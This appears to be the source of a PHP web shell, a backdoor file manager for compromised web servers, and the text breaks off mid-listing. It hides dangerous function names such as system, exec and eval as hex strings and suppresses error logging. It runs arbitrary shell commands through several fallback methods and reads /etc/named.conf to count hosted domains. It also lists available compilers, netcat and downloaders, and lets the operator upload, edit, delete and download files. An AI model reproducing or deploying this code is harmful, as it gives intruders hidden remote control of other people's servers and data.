$logo = 'https://1.bp.blogspot.com/-M0ZH5WcjeLk/YPHKrrDwwqI/AAAAAAAAALQ/UElzDOSvAwErnaFmd0hSxqxN6gCiC4-cwCLcBGAsYHQ/s320/images.jpeg';
$func = [&quot;7068705f756e616d65&quot;, &quot;70687076657273696f6e&quot;, &quot;676574637764&quot;, &quot;6368646972&quot;, &quot;707265675f73706c6974&quot;, &quot;61727261795f64696666&quot;, &quot;69735f646972&quot;, &quot;69735f66696c65&quot;, &quot;69735f7772697461626c65&quot;, &quot;69735f7265616461626c65&quot;, &quot;66696c6573697a65&quot;, &quot;636f7079&quot;, &quot;66696c655f657869737473&quot;, &quot;66696c655f7075745f636f6e74656e7473&quot;, &quot;66696c655f6765745f636f6e74656e7473&quot;, &quot;6d6b646972&quot;, &quot;72656e616d65&quot;, &quot;737472746f74696d65&quot;, &quot;68746d6c7370656369616c6368617273&quot;, &quot;64617465&quot;, &quot;66696c656d74696d65&quot;, &quot;7363616e646972&quot;, &quot;73797374656d&quot;, &quot;65786563&quot;, &quot;7061737374687275&quot;, &quot;7368656c6c5f65786563&quot;, &quot;6f625f6765745f636f6e74656e7473&quot;, &quot;6f625f656e645f636c65616e&quot;, &quot;6469726e616d65&quot;, &quot;6469736b5f746f74616c5f7370616365&quot;, &quot;6469736b5f667265655f7370616365&quot;, &quot;696e695f676574&quot;, &quot;707265675f6d617463685f616c6c&quot;, &quot;706f7369785f6765747077756964&quot;, &quot;706f7369785f6765746772676964&quot;, &quot;70617468696e666f&quot;, &quot;66696c656f776e6572&quot;, &quot;66696c6567726f7570&quot;, &quot;66696c6574797065&quot;, &quot;676574486f73744e616d65&quot;, &quot;676574486f737442794e616d65&quot;, &quot;737562737472&quot;, &quot;737472737472&quot;, &quot;696e695f736574&quot;, &quot;66696c65&quot;, &quot;7374725f7265706c616365&quot;, &quot;6578706c6f6465&quot;, &quot;6576616c&quot;, &quot;6f625f7374617274&quot;, &quot;66756e6374696f6e5f657869737473&quot;, &quot;6572726f725f7265706f7274696e67&quot;, &quot;7365745f74696d655f6c696d6974&quot;, &quot;636c656172737461746361636865&quot;, &quot;646174655f64656661756c745f74696d657a6f6e655f736574&quot;, &quot;666c757368&quot;, &quot;7374726c656e&quot;, &quot;7472696d&quot;, &quot;656d707479&quot;, &quot;6973736574&quot;, &quot;66696c657065726d73&quot;, &quot;7374726c656e&quot;, &quot;636f756e74&quot;, &quot;726f756e64&quot;, &quot;6d696d655f636f6e74656e745f74797065&quot;, &quot;6765745f63757272656e745f75736572&quot;, &quot;6765746d79756964&quot;, &quot;6765746d79676964&quot;, &quot;706f7369785f67657465756964&quot;, &quot;706f7369785f67657465676964&quot;];

for ($i = 0; $i < count($func); $i++) {
	$func[$i] = dehex($func[$i]);
}

session_start();
$func[50](0);
@$func[51](0);
@$func[52]();
@$func[43]('error_log', null);
@$func[43]('log_errors',0);
@$func[43]('max_execution_time',0);
@$func[43]('output_buffering',0);
@$func[43]('display_errors', 0);
$func[53](&quot;Asia/Jakarta&quot;);

if (isset($_GET['dir'])) {
	$dir = $_GET['dir'];
	$func[3]($dir);
} else {
	$dir = $func[2]();
}
	
$d0mains = @$func[44](&quot;/etc/named.conf&quot;, false);
if (!$d0mains) {
	$dom = &quot;<font class='text-danger'>Can't Read /etc/named.conf</font>&quot;;
} else { 
	$count = 0;
	foreach ($d0mains as $d0main) {
		if (@$func[43]($d0main, &quot;zone&quot;)) {
			$func[32]('#zone &quot;(.*)&quot;#', $d0main, $domains);
			$func[54]();
			if ($func[55]($func[56]($domains[1][0])) > 2){
				$func[54]();
				$count++;
			}
		}
	}
	$dom = &quot;<font class='text-success'>$count Domain</font>&quot;;
}

$dir = $func[45](&quot;\\&quot;, &quot;/&quot;, $dir);
$scdir = $func[46](&quot;/&quot;, $dir);
$total = $func[29]($dir);
$free = $func[30]($dir);
$pers =  (int) ($free / $total * 100);
$ds = @$func[31](&quot;disable_functions&quot;);
$show_ds = (!empty($ds)) ? &quot;<font class='text-danger'>$ds</font>&quot; : &quot;<font class='text-success'>All function is accessible</font>&quot;;

$cmd_uname = exe(&quot;uname -a&quot;);
$uname = $func[49]('php_uname') ? $func[41](@$func[0](), 0, 120) : ($func[55]($cmd_uname) > 0 ? $cmd_uname : '( php_uname ) Function Disabled !');

if (strtolower($func[41](PHP_OS, 0, 3)) == &quot;win&quot;) {
	$sys = &quot;win&quot;;
} else {
	$sys = &quot;unix&quot;;
}

if (isset($_GET['do'])) {
	$do = $_GET['do'];
	if ($do == 'delete') {
		if ($func[12]($dir)) {
			if (deleter($dir)) {
				flash(&quot;File/Folder deleted successfully!&quot;, &quot;Success&quot;, &quot;success&quot;, &quot;?dir=&quot; . dirname($dir));
			} else {
				flash(&quot;File/Folder failed to delete!&quot;, &quot;Failed&quot;, &quot;danger&quot;);
			}
		} else {
			flash(&quot;File/Folder is doesn't exist!&quot;, &quot;Failed&quot;, &quot;warning&quot;);
		}
	} else if ($do == 'download') {
		if ($func[12]($dir)) {
			header(&quot;Content-Type: application/octet-stream&quot;);
			header(&quot;Content-Transfer-Encoding: Binary&quot;);
			header(&quot;Content-Length: &quot; . $func[10]($dir));
			header(&quot;Content-disposition: attachment; filename=\&quot;&quot;.basename($dir).&quot;\&quot;&quot;);
		} else {
			flash(&quot;File is doesn't exist!&quot;, &quot;Failed&quot;, &quot;warning&quot;);
		}
	}
} else {
	$do = 'filesman';
	$title = 'Files Manager';
	$icon = 'archive';
}

((isset($_POST[&quot;foldername&quot;])) ? ($func[12](&quot;$dir/{$_POST['foldername']}&quot;) ? flash(&quot;Folder name is exist!&quot;, &quot;Failed&quot;, &quot;warning&quot;) : ($func[15](&quot;$dir/{$_POST['foldername']}&quot;) ? flash(&quot;Folder created successfully!&quot;, &quot;Success&quot;, &quot;success&quot;) : flash(&quot;Folder failed to create!&quot;, &quot;Failed&quot;, &quot;danger&quot;))) : null);

((isset($_POST[&quot;filename&quot;]) &amp;&amp; isset($_POST['filecontent'])) ? ($func[12](&quot;$dir/{$_POST['filename']}&quot;) ? flash(&quot;File name is exist!&quot;, &quot;Failed&quot;, &quot;warning&quot;) : ($func[13](&quot;$dir/{$_POST['filename']}&quot;, $_POST['filecontent']) ? flash(&quot;File created successfully!&quot;, &quot;Success&quot;, &quot;success&quot;) : flash(&quot;File failed to create!&quot;, &quot;Failed&quot;, &quot;danger&quot;))) : null);

((isset($_POST[&quot;newname&quot;]) &amp;&amp; isset($_POST['oldname'])) ? ($func[12](&quot;$dir/{$_POST['newname']}&quot;) ? flash(&quot;File/Folder name is exist!&quot;, &quot;Failed&quot;, &quot;warning&quot;) : ($func[16](&quot;$dir/{$_POST['oldname']}&quot;, $_POST['newname']) ? flash(&quot;File/Folder renamed successfully!&quot;, &quot;Success&quot;, &quot;success&quot;) : flash(&quot;File/Folder failed to rename!&quot;, &quot;Failed&quot;, &quot;danger&quot;))) : null);

((isset($_POST[&quot;filename&quot;]) &amp;&amp; isset($_POST['content'])) ? ($func[13](&quot;$dir/{$_POST['filename']}&quot;, $_POST['content']) ? flash(&quot;File saved successfully!&quot;, &quot;Success&quot;, &quot;success&quot;) : flash(&quot;File failed to save!&quot;, &quot;Failed&quot;, &quot;danger&quot;)) : null);

if (isset($_FILES[&quot;uploadfile&quot;])) {
	$n = $_FILES[&quot;uploadfile&quot;][&quot;name&quot;];
	for ($i = 0; $i < count($n); $i++) {
		if ($func[11]($_FILES[&quot;uploadfile&quot;][&quot;tmp_name&quot;][$i], $n[$i])) {
			flash(&quot;File uploaded successfully!&quot;, &quot;Success&quot;, &quot;success&quot;);
		} else {
			flash(&quot;File failed to upload!&quot;, &quot;Failed&quot;, &quot;danger&quot;);
		}
	}
}

if (@$func[31]('open_basedir')) {
	$basedir_data = @$func[31]('open_basedir');
	if ($func[55]($basedir_data) > 120){
		$open_b = &quot;<font class='text-success'>&quot; . $func[41]($basedir_data, 0, 120) . &quot;...</font>&quot;;
	} else {
		$open_b = '<font class=&quot;text-success&quot;>' . $basedir_data . '</font>';
	}
} else {
	$open_b = '<font class=&quot;text-warning&quot;>NONE</font>';
}

if (!$func[49]('posix_getegid')) {
	$user = $func[49](&quot;get_current_user&quot;) ? @$func[64]() : &quot;????&quot;;
	$uid = $func[49](&quot;getmyuid&quot;) ? @$func[65]() : &quot;????&quot;;
	$gid = $func[49](&quot;getmygid&quot;) ? @$func[66]() : &quot;????&quot;;
	$group = &quot;?&quot;;
} else {
	$uid = $func[49](&quot;posix_getpwuid&quot;) &amp;&amp; $func[49](&quot;posix_geteuid&quot;) ? @$func[33]($func[67]()) : [&quot;name&quot; => &quot;????&quot;, &quot;uid&quot; => &quot;????&quot;];
	$gid = $func[49](&quot;posix_getgrgid&quot;) &amp;&amp; $func[49](&quot;posix_getegid&quot;) ? @$func[34]($func[68]()) : [&quot;name&quot; => &quot;????&quot;, &quot;gid&quot; => &quot;????&quot;];
	$user = $uid['name'];
	$uid = $uid['uid'];
	$group = $gid['name'];
	$gid = $gid['gid'];
}

if ($sys == 'unix') {
	if (!@$func[31]('safe_mode')) {
		if ($func[55](exe(&quot;id&quot;)) > 0) {
			$userful = ['gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzialfa2','nc','locate','suidperl'];
			$x = 0;
			foreach ($userful as $i) {
				if (which($i)) {
					$x++;
					$useful .= $i . ', ';
				}
			}
			if ($x == 0) {
				$useful = '--------';
			}
			$downloaders = ['wget','fetch','lynx','links','curl','get','lwp-mirror'];
			$x = 0;
			foreach($downloaders as $i) {
				if (which($i)) {
					$x++;
					$downloader .= $i . ', ';
				}
			}
			if ($x == 0) {
				$downloader = '--------';
			}
		}
	}
}

function hex($str) {
	global $func;
	$r = &quot;&quot;;
	for ($i = 0; $i < $func[55]($str); $i++) {
		$r .= dechex(ord($str[$i]));
	}
	return $r;
}

function dehex($str) {
	$r = &quot;&quot;;
	$len = (strlen($str) - 1);
	for ($i = 0; $i < $len; $i += 2) {
		$r .= chr(hexdec($str[$i].$str[$i + 1]));
	}
	return $r;
}

function formatSize($bytes) {
	$types = array( 'B', 'KB', 'MB', 'GB', 'TB' );
	for ( $i = 0; $bytes >= 1024 &amp;&amp; $i < ( count( $types ) - 1 ); $bytes /= 1024, $i++ );
	return( round( $bytes, 2 ).&quot; &quot;.$types[$i] );
}

function perms($file) {
	global $func;
	$perms = fileperms($file);
	if (($perms &amp; 0xC000) == 0xC000){
		$info = 's';
	}elseif (($perms &amp; 0xA000) == 0xA000){
		$info = 'l';
	}elseif (($perms &amp; 0x8000) == 0x8000){
		$info = '-';
	}elseif (($perms &amp; 0x6000) == 0x6000){
		$info = 'b';
	}elseif (($perms &amp; 0x4000) == 0x4000){
		$info = 'd';
	}elseif (($perms &amp; 0x2000) == 0x2000){
		$info = 'c';
	}elseif (($perms &amp; 0x1000) == 0x1000){
	$info = 'p';
	}else{
		$info = 'u';
	}
	$info .= (($perms &amp; 0x0100) ? 'r' : '-');
	$info .= (($perms &amp; 0x0080) ? 'w' : '-');
	$info .= (($perms &amp; 0x0040) ?
	(($perms &amp; 0x0800) ? 's' : 'x' ) :
	(($perms &amp; 0x0800) ? 'S' : '-'));
	$info .= (($perms &amp; 0x0020) ? 'r' : '-');
	$info .= (($perms &amp; 0x0010) ? 'w' : '-');
	$info .= (($perms &amp; 0x0008) ?
	(($perms &amp; 0x0400) ? 's' : 'x' ) :
	(($perms &amp; 0x0400) ? 'S' : '-'));
	$info .= (($perms &amp; 0x0004) ? 'r' : '-');
	$info .= (($perms &amp; 0x0002) ? 'w' : '-');
	$info .= (($perms &amp; 0x0001) ?
	(($perms &amp; 0x0200) ? 't' : 'x' ) :
	(($perms &amp; 0x0200) ? 'T' : '-'));
	return $func[41](sprintf('%o', $perms), -4) . ' >> ' .$info;
}

function exe($in) {
	global $func;
	$out = '';
	try {
		if ($func[49]('exec')) {
			@$func[23]($in, $out);
			$out = @join(&quot;\n&quot;, $out);
		} elseif ($func[49]('passthru')) {
			$func[48]();
			@passthru($in);
			$out = $func[27]();
		} elseif($func[49]('system')) {
			$func[48]();
			@system($in);
			$out = $func[27]();
		} elseif ($func[49]('shell_exec')) {
			$out = $func[25]($in);
		} elseif ($func[49](&quot;popen&quot;) &amp;&amp; $func[49](&quot;pclose&quot;)) {
			if (is_resource($f = @popen($in,&quot;r&quot;))) {
				$out = &quot;&quot;;
				while(!@feof($f))
				$out .= fread($f, 1024);
				pclose($f);
			}
		} elseif ($func[49]('proc_open')) {
			$pipes = [];
			$process = @proc_open($in.' 2>&amp;1', array(array(&quot;pipe&quot;,&quot;w&quot;), array(&quot;pipe&quot;,&quot;w&quot;), array(&quot;pipe&quot;,&quot;w&quot;)), $pipes, null);
			$out = @stream_get_contents($pipes[1]);
		} elseif (class_exists('COM')) {
			$ws = new COM('WScript.shell');
			$exec = $ws->exec('cmd.exe /c '.$in);
			$stdout = $exec->StdOut();
			$out = $stdout->ReadAll();
		}
	} catch(Exception $e) {}
	return $out;
}

function checkName($name) {
	global $func;
	if ($func[55]($name) > 18) {
		return $func[41]($name, 0, 18) . &quot;...&quot;;
	}
	return $name;
}

function checkPerm($dir, $perm) {
	global $func;
	$perm = explode('>>', $perm);
	if ($func[8]($dir)) {
		return &quot;<font class='text-success'>&quot;.$perm[0].&quot;</font> >> <font class='text-success'>&quot;.$perm[1].&quot;</font>&quot;;
	} elseif (!$func[9]($dir)) {
		return &quot;<font class='text-danger'>&quot;.$perm[0].&quot;</font> >> <font class='text-danger'>&quot;.$perm[1].&quot;</font>&quot;;
	} else {
		return &quot;<font class='text-secondary'>&quot;.$perm[0].&quot;</font> >> <font class='text-secondary'>&quot;.$perm[1].&quot;</font>&quot;;
	}
}

function getowner($item) {
	global $func;
	if ($func[49](&quot;posix_getpwuid&quot;)) {
		$downer = @$func[33](fileowner($item));
		$downer = $downer['name'];
	} else {
		$downer = fileowner($item);
	}
	if ($func[49](&quot;posix_getgrgid&quot;)) {
		$dgrp = @$func[34](filegroup($item));
		$dgrp = $dgrp['name'];
	} else {
		$dgrp = filegroup($item);
	}
	return $downer . '/' . $dgrp;
}

function geticon($file) {
	global $func;
	$ext = strtolower($func[35]($file, PATHINFO_EXTENSION));
	if ($ext == 'php' || $ext == 'html' || $ext == 'js' || $ext == 'css' || $ext == 'py' || $ext == 'perl' || $ext == 'sh') {
		return 'file-code';
	} else if ($ext == 'pdf') {
		return 'file-pdf';
	} else if ($ext == 'txt') {
		return 'file-alt';
	} else if ($ext == 'csv') {
		return 'file-csv';
	} else if ($ext == 'jpg' || $ext == 'png' || $ext == 'jpeg' || $ext == 'gif') {
		return 'file-image';
	} else if ($ext == 'mp4' || $ext == '3gp' || $ext == 'mkv') {
		return 'file-video';
	} else if ($ext == 'docx' || $ext == 'doc' || $ext == 'docm') {
		return 'file-word';
	} else if ($ext == 'ppt' || $ext == 'pptx') {
		return 'file-powerpoint';
	} else if ($ext == 'xlsx' || $ext == 'xlsb' || $ext == 'xlsm' || $ext == 'xltx' || $ext == 'xltm') {
		return 'file-excel';
	} else if ($ext == 'mp3' || $ext == 'wav') {
		return 'file-audio';
	} else if ($ext == 'sql' || $ext == 'db') {
		return 'database';
	} else if ($ext == 'zip' || $ext == 'tar' || $ext == 'gz' || $ext == 'tar.gz' || $ext == '7z' || $ext == 'bz2') {
		return 'file-archive';
	} else {
		return 'file';
	}
}

function which($p) {
	global $func;
	$path = exe('which ' . $p);
	if (!empty($path)) {
		return $func[55]($path);
	}
	return false;
}

function flash($message, $status, $class, $redirect = false) {
	if (!empty($_SESSION[&quot;message&quot;])) {
		unset($_SESSION[&quot;message&quot;]);
	}
	if (!empty($_SESSION[&quot;class&quot;])) {
		unset($_SESSION[&quot;class&quot;]);
	}
	if (!empty($_SESSION[&quot;status&quot;])) {
		unset($_SESSION[&quot;status&quot;]);
	}
	$_SESSION[&quot;message&quot;] = $message;
	$_SESSION[&quot;class&quot;] = $class;
	$_SESSION[&quot;status&quot;] = $status;
	if ($redirect) {
		header('Location: ' . $redirect);
		exit();
	}
	return true;
}

function clear() {
	if (!empty($_SESSION[&quot;message&quot;])) {
		unset($_SESSION[&quot;message&quot;]);
	}
	if (!empty($_SESSION[&quot;class&quot;])) {
		unset($_SESSION[&quot;class&quot;]);
	}
	if (!empty($_SESSION[&quot;status&quot;])) {
		unset($_SESSION[&quot;status&quot;]);
	}
	return true;
}

function deleter($d) {
	global $func;
	if (trim($func[35]($d, PATHINFO_BASENAME), '.') === '') {
		return false;
	};
	if ($func[6]($d)) {
		array_map(&quot;deleter&quot;, glob($d . DIRECTORY_SEPARATOR . '{,.}*', GLOB_BRACE | GLOB_NOSORT));
		rmdir($d);
		return true;
	} else {
		unlink($d);
		return true;
	}
	return false;
}

$scandir = $func[21]($dir);

?>
<!doctype html>
<html lang=&quot;en&quot;>
<head>
	<meta charset=&quot;utf-8&quot;>
	<meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1&quot;>
	<link href=&quot;https://cdn.jsdelivr.net/npm/bootstrap@5.0.1/dist/css/bootstrap.min.css&quot; rel=&quot;stylesheet&quot; integrity=&quot;sha384-+0n0xVW2eSR5OomGNYDnhzAbDsOXxcvSN1TPprVMTNDbiYZCxYbOOl7+AMvyTG2x&quot; crossorigin=&quot;anonymous&quot;>
	<link rel=&quot;stylesheet&quot; href=&quot;https://pro.fontawesome.com/releases/v5.10.0/css/all.css&quot; integrity=&quot;sha384-AYmEC3Yw5cVb3ZcuHtOA93w35dYTsvhLPVnYs9eStHfGJvOvKxVfELGroGkvsg+p&quot; crossorigin=&quot;anonymous&quot;/>
	<title><?= $shellName ?></title>
</head>
<body>
	<div class=&quot;container-lg&quot;>
		
		<nav class=&quot;navbar navbar-light bg-light&quot;>
			<div class=&quot;container-fluid&quot;>
				<a class=&quot;navbar-brand&quot; href=&quot;?&quot;>
					<img src=&quot;<?= $logo ?>&quot; alt=&quot;logo&quot; width=&quot;30&quot; height=&quot;24&quot; class=&quot;d-inline-block align-text-top&quot;>
					<?= $shellName ?>
				</a>
			</div>
		</nav>
		
		<?php if (isset($_SESSION['message'])) : ?>
		<div class=&quot;alert alert-<?= $_SESSION['class'] ?> alert-dismissible fade show my-3&quot; role=&quot;alert&quot;>
			<strong><?= $_SESSION['status'] ?>!</strong> <?= $_SESSION['message'] ?>
			<button type=&quot;button&quot; class=&quot;btn-close&quot; data-bs-dismiss=&quot;alert&quot; aria-label=&quot;Close&quot;></button>
		</div>
		<?php endif; clear(); ?>

		<div id=&quot;tool&quot;>
			<div class=&quot;d-flex justify-content-center flex-wrap my-3&quot;>
				<a href=&quot;?&quot; class=&quot;m-1 btn btn-outline-dark btn-sm&quot;><i class=&quot;fa fa-home&quot;></i> Home</a>
				<a class=&quot;m-1 btn btn-outline-dark btn-sm&quot; data-bs-toggle=&quot;collapse&quot; href=&quot;#upload&quot; role=&quot;button&quot; aria-expanded=&quot;false&quot; aria-controls=&quot;collapseExample&quot;><i class=&quot;fa fa-upload&quot;></i> Upload</a>
				<a class=&quot;m-1 btn btn-outline-dark btn-sm&quot; data-bs-toggle=&quot;collapse&quot; href=&quot;#newfile&quot; role=&quot;button&quot; aria-expanded=&quot;false&quot; aria-controls=&quot;collapseExample&quot;><i class=&quot;fa fa-file-plus&quot;></i> New File</a>
				<a class=&quot;m-1 btn btn-outline-dark btn-sm&quot; data-bs-toggle=&quot;collapse&quot; href=&quot;#newfolder&quot; role=&quot;button&quot; aria-expanded=&quot;false&quot; aria-controls=&quot;collapseExample&quot;><i class=&quot;fa fa-folder-plus&quot;></i> New Folder</a>
			</div>
			
			<div class=&quot;row&quot;>
				<div class=&quot;col-md-12&quot;>
					<div class=&quot;collapse&quot; id=&quot;upload&quot; data-bs-parent=&quot;#tool&quot;>
						<div class=&quot;card card-body border-dark mb-3&quot;>
							<div class=&quot;row&quot;>
								 <div class=&quot;col-md-6&quot;>
									<form action=&quot;&quot; method=&quot;post&quot; enctype=&quot;multipart/form-data&quot;>
										<div class=&quot;input-group&quot;>
											<input type=&quot;file&quot; class=&quot;form-control&quot; name=&quot;uploadfile[]&quot; id=&quot;inputGroupFile04&quot; aria-describedby=&quot;inputGroupFileAddon04&quot; aria-label=&quot;Upload&quot;>
											<button class=&quot;btn btn-outline-dark&quot; type=&quot;submit&quot; id=&quot;inputGroupFileAddon04&quot;>Upload</button>
										</div>
									</form>
								 </div>
							</div>
						</div>
					</div>
				</div>
				<div class=&quot;col-md-12&quot;>
					<div class=&quot;collapse&quot; id=&quot;newfile&quot; data-bs-parent=&quot;#tool&quot;>
						<div class=&quot;card card-body border-dark mb-3&quot;>
							<div class=&quot;row&quot;>
								<div class=&quot;col-md-6&quot;>
									<form action=&quot;&quot; method=&quot;post&quot;>
										<div class=&quot;mb-3&quot;>
											<label class=&quot;form-label&quot;>File Name</label>
											<input type=&quot;text&quot; class=&quot;form-control&quot; name=&quot;filename&quot; placeholder=&quot;./sToryAn9el.txt&quot;>
										</div>
										<div class=&quot;mb-3&quot;>
											<label class=&quot;form-label&quot;>File Content</label>
											<textarea class=&quot;form-control&quot; rows=&quot;5&quot; name=&quot;filecontent&quot;></textarea>
										</div>
										<button type=&quot;submit&quot; class=&quot;btn btn-outline-dark&quot;>Create</button>
									</form>
								</div>
							</div>
						</div>
					</div>
				</div>
				<div class=&quot;col-md-12&quot;>
					<div class=&quot;collapse&quot; id=&quot;newfolder&quot; data-bs-parent=&quot;#tool&quot;>
						<div class=&quot;card card-body border-dark mb-3&quot;>
							<div class=&quot;row&quot;>
								<div class=&quot;col-md-6&quot;>
									<form action=&quot;&quot; method=&quot;post&quot;>
										<div class=&quot;mb-3&quot;>
											<label class=&quot;form-label&quot;>Folder Name</label>
											<input type=&quot;text&quot; class=&quot;form-control&quot; name=&quot;foldername&quot; placeholder=&quot;./sToryAn9el&quot;>
										</div>
										<button type=&quot;submit&quot; class=&quot;btn btn-outline-dark&quot;>Create</button>
									</form>
								</div>
							</div>
						</div>
					</div>
				</div>
			</div>
		</div>

		<div class=&quot;row&quot;>
			<div class=&quot;col-md-12&quot;>
				<div class=&quot;card border-dark&quot;>
					<div class=&quot;card-body&quot;>
						<h5><i class=&quot;fa fa-server&quot;></i> Server Information </h5>
						<div class=&quot;table-responsive&quot;>
							<table class=&quot;table table-hover text-nowrap&quot;>
								<tr>
									<td>Operating System</td>
									<td> : <?= $uname ?></td>
								</tr>
								<tr>
									<td>User / Group</td>
									<td> : <?= $uid ?>[<?= $user ?>] / <?= $gid ?>[<?= $group ?>]</td>
								</tr>
								<tr>
									<td>PHP Version</td>
									<td> : <?= $func[1]() ?></td>
								</tr>
								<tr>
									<td>IP Server</td>
									<td> : <?= (!@$_SERVER[&quot;SERVER_ADDR&quot;] ? ($func[49](&quot;gethostbyname&quot;) ? @gethostbyname($_SERVER['SERVER_NAME']) : '????') : @$_SERVER[&quot;SERVER_ADDR&quot;]) ?></td>
								</tr>
								<tr>
									<td>Storage</td>
									<td class=&quot;d-flex&quot;>: Total = <?= formatSize($total) ?>, Free = <?= formatSize($free) ?> [<?= $pers ?>%]</td>
								</tr>
								<tr>
									<td>Domains</td>
									<td>: <?= $dom ?></td>
								</tr>
								<tr>
									<td>Software</td>
									<td>: <?= $_SERVER['SERVER_SOFTWARE'] ?></td>
								</tr>
								<tr>
									<td>Disable Functions</td>
									<td>: <?= $show_ds ?></td>
								</tr>
								<tr>
									<td>Useful Functions</td>
									<td>: <?= rtrim($useful, ', ') ?></td>
								</tr>
								<tr>
									<td>Downloader</td>
									<td>: <?= rtrim($downloader, ', ') ?></td>
								</tr>
								<tr>
									<td colspan=&quot;2&quot;>CURL : <?= $func[49]('curl_version') ? '<font class=&quot;text-success&quot;>ON</font>' : '<font class=&quot;text-danger&quot;>OFF</font>' ?> | SSH2 : <?= $func[49]('ssh2_connect') ? '<font class=&quot;text-success&quot;>ON</font>' : '<font class=&quot;text-danger&quot;>OFF</font>' ?> | Magic Quotes : <?= $func[49]('get_magic_quotes_gpc') ? '<font class=&quot;text-success&quot;>ON</font>' : '<font class=&quot;text-danger&quot;>OFF</font>' ?> | MySQL : <?= $func[49]('mysql_get_client_info') || class_exists('mysqli') ? '<font class=&quot;text-success&quot;>ON</font>' : '<font class=&quot;text-danger&quot;>OFF</font>' ?> | MSSQL : <?= $func[49]('mssql_connect') ? '<font class=&quot;text-success&quot;>ON</font>' : '<font class=&quot;text-danger&quot;>OFF</font>' ?> | PostgreSQL : <?= $func[49]('pg_connect') ? '<font class=&quot;text-success&quot;>ON</font>' : '<font class=&quot;text-danger&quot;>OFF</font>' ?> | Oracle : <?= $func[49]('oci_connect') ? '<font class=&quot;text-success&quot;>ON</font>' : '<font class=&quot;text-danger&quot;>OFF</font>' ?></td>
								</tr>
								<tr>
									<td colspan=&quot;2&quot;>Safe Mode : <?= @$func[31]('safe_mode') ? '<font class=&quot;text-success&quot;>ON</font>' : '<font class=&quot;text-danger&quot;>OFF</font>' ?> | Open Basedir : <?= $open_b ?> | Safe Mode Exec Dir : <?= @$func[31]('safe_mode_exec_dir') ? '<font class=&quot;text-success&quot;>'. @$func[31]('safe_mode_exec_dir') .'</font>' : '<font class=&quot;text-warning&quot;>NONE</font>' ?> | Safe Mode Include Dir : <?= @$func[31]('safe_mode_include_dir') ? '<font class=&quot;text-success&quot;>'. @$func[31]('safe_mode_include_dir') .'</font>' : '<font class=&quot;text-warning&quot;>NONE</font>' ?></td>
								</tr>
							</table>
						</div>
					</div>
				</div>
			</div>
			<div class=&quot;col-md-12 my-3&quot;>
				<div class=&quot;card border-dark&quot;>
					<div class=&quot;card-body&quot;>
						<h5><i class=&quot;fa fa-wave-square&quot;></i> Path </h5>
						<nav aria-label=&quot;breadcrumb&quot; style=&quot;--bs-breadcrumb-divider: '>';&quot;>
							<ol class=&quot;breadcrumb&quot;>
								<?php
									$numDir = count($scdir);
									foreach ($scdir as $id => $pat) {
										if ($pat == '' &amp;&amp; $id == 0) {
											echo '<li class=&quot;breadcrumb-item&quot;><a class=&quot;text-decoration-none text-dark&quot; href=&quot;?dir=/&quot;>/</a></li>';
											continue;
										}
										if ($pat == '') continue;
										if ($id + 1 == $numDir) {
											echo '<li class=&quot;breadcrumb-item active&quot; aria-current=&quot;page&quot;>'.$pat.'</li>';
										} else {
											echo '<li class=&quot;breadcrumb-item&quot;><a class=&quot;text-decoration-none text-dark&quot; href=&quot;?dir=';
											for ($i = 0; $i <= $id; $i++) {
												echo &quot;$scdir[$i]&quot;;
												if ($i != $id) echo &quot;/&quot;;
											}
											echo '&quot;>'.$pat.'</a></li>';
										}
									}
								?>
							</ol>
						</nav>
						[ <?= checkPerm($dir, perms($dir)) ?> ]
					</div>
				</div>
			</div>
			<div class=&quot;col-md-12&quot; id=&quot;main&quot;>
				<div class=&quot;card border-dark overflow-auto&quot;>
					<div class=&quot;card-body&quot;>
						<h5><i class=&quot;fa fa-<?= $icon ?>&quot;></i> <?= $title ?></h5>
						<?php if ($do == 'view') : ?>
							<h1>Anjing</h1>
						<?php else: ?>
							<?php if ($func[9]($dir)) : ?>
								<div class=&quot;table-responsive&quot;>
									<table class=&quot;table table-hover text-nowrap&quot;>
										<thead>
											<tr>
												<th>Name</th>
												<th>Type</th>
												<th>Size</th>
												<th>Last Modified</th>
												<th>Owner/Group</th>
												<th>Permission</th>
												<th>Action</th>
											</tr>
										</thead>
										<tbody>
											<?php
												foreach ($scandir as $item) :
													if (!$func[6]($dir . '/' . $item)) continue;
											?>
												<tr>
													<td>
														<?php if ($item === '..') : ?>
														<a href=&quot;?dir=<?= $func[28]($dir); ?>&quot; class=&quot;text-decoration-none text-dark&quot;><i class=&quot;fa fa-folder-open&quot;></i> <?= $item ?></a>
														<?php elseif ($item === '.') :  ?>
														<a href=&quot;?dir=<?= $dir; ?>&quot; class=&quot;text-decoration-none text-dark&quot;><i class=&quot;fa fa-folder-open&quot;></i> <?= $item ?></a>
														<?php else : ?>
														<a href=&quot;?dir=<?= $dir . '/' . $item ?>&quot; class=&quot;text-decoration-none text-dark&quot;><i class=&quot;fa fa-folder&quot;></i> <?= checkName($item); ?></a>
														<?php endif; ?>
													</td>
													<td><?= $func[38]($item) ?></td>
													<td class=&quot;align-middle&quot;>--</td>
													<td><?= $func[19](&quot;Y-m-d h:i:s&quot;, $func[20]($item)); ?></td>
													<td><?= getowner($item) ?></td>
													<td><?= checkPerm($dir . '/' . $item, perms($dir . '/' . $item))  ?></td>
													<td>
														<button type=&quot;button&quot; class=&quot;btn btn-outline-dark btn-sm mr-1&quot; <?= $item === &quot;..&quot; || $item === &quot;.&quot; ? '' : 'data-bs-toggle=&quot;modal&quot; data-bs-target=&quot;#renameModal&quot; data-bs-name=&quot;'.$item.'&quot;' ?>><i class=&quot;fa fa-edit&quot;></i></button>
														<button type=&quot;button&quot; class=&quot;btn btn-outline-dark btn-sm mr-1&quot; <?= $item === &quot;..&quot; || $item === &quot;.&quot; ? '' : 'data-bs-toggle=&quot;modal&quot; data-bs-target=&quot;#deleteModal&quot; data-bs-file=&quot;'.$dir . '/' . $item.'&quot;'?>><i class=&quot;fa fa-trash-alt&quot;></i></button>
													</td>
												</tr>
											<?php endforeach; ?>
											<?php
												foreach ($scandir as $item) :
													if (!$func[7]($dir . '/' . $item)) continue;
											?>
												<tr>
													<td><a data-bs-toggle=&quot;modal&quot; href=&quot;#viewModal&quot; role=&quot;button&quot; data-bs-name=&quot;<?= $item ?>&quot; data-bs-content=&quot;<?= $func[18](@$func[14]($item)) ?>&quot; class=&quot;text-dark text-decoration-none&quot;><i class=&quot;fa fa-<?= geticon($item) ?>&quot;></i> <?= checkName($item); ?></a></td>
													<td><?= checkName(($func[49]('mime_content_type') ? $func[63]($item) : $func[38]($item))) ?></td>
